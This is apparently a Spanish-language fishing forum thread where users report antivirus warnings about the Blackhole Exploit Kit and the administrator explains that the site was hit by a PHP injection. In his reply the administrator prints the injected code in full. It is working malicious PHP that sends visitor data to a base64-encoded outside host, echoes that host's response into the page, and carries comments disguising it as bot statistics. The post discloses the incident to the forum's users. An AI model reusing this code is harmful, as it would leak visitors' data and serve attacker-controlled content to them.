Blackhole Exploit Kit
Blackhole Exploit Kit
Hola,
Este es un mensaje para los moderadores, especialmente, por lo que creo, para Manuel José.
Te cuento que el anti virus de mi computador no me deja entrar a la página ya que dice que hay una amenaza en ésta que es Blackhole Exploit Kit.
Sabes algo de eso?
Saludos y gracias,
Lautaro
Este es un mensaje para los moderadores, especialmente, por lo que creo, para Manuel José.
Te cuento que el anti virus de mi computador no me deja entrar a la página ya que dice que hay una amenaza en ésta que es Blackhole Exploit Kit.
Sabes algo de eso?
Saludos y gracias,
Lautaro
- nemesio espinoza
- Mosquero Intermedio
Re: Blackhole Exploit Kit
a mi tambien me aparece cada vez que abro la pagina, no dije nada antes porque pense que era mi computadora, pero parece que no ,otra cosa desde que entro a la pagina siempre tuve el mensaje de error en la pagina esto es frecuente. ¿que esta pasando?
x3
Especificamente utilizo el avast.
Saludos
Especificamente utilizo el avast.
Saludos
Yo uso el AVG...
- Manuel Jose
- Administrador
- Real Name: Manuel José
Usuarios de Avast y AVG están teniendo estos mensajes.
Para su tranquilidad:
Se trata de un mecanismo denominado "PHP Injection Attack" en donde nuestro sitio se ha visto afectado. En resumen, se agrega un código encriptado a la cabecera de ciertos ficheros *.php que redirigen al navegador a un sitio infectado.
Parte del código que se inserta en nuestros ficheros:
Si decodificamos esto:
Obtenemos esto:
Estoy trabajando para prevenir esta práctica en el futuro.
Muchas gracias por su paciencia.
Para su tranquilidad:
Se trata de un mecanismo denominado "PHP Injection Attack" en donde nuestro sitio se ha visto afectado. En resumen, se agrega un código encriptado a la cabecera de ciertos ficheros *.php que redirigen al navegador a un sitio infectado.
Parte del código que se inserta en nuestros ficheros:
Code: Select all
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==
http://botstatisticupdate.com/stat/stat.php
Muchas gracias por su paciencia.
- ctorresmol
- Mosquero Fino
- Real Name: Carlos Eduardo
a mi me pasa que cuando abro el foro aparecen chicas desnudas everywere, por eso paso tanto tiempo conectado
La ciencia moderna aún no ha elaborado un medicamento tranquilizador tan eficaz como la pesca con mosca seca...
http://www.flickr.com/photos/ctorresmolina
http://www.flickr.com/photos/ctorresmolina
- Manuel Jose
- Administrador
- Real Name: Manuel José
Y ahora?
- Gaushito
- Moderador
- Real Name: David Alvarez
ta madre....porque a mi no me ha pasado.....ctorresmol wrote:a mi me pasa que cuando abro el foro aparecen chicas desnudas everywere, por eso paso tanto tiempo conectado

...Soy Potro Que No Se Junta Con Los Domaos A Palenque...
Todo bien, sin problemas!!!Manuel Jose wrote:Y ahora?
Muchas gracias Manuel José...
Saludos,
Lautaro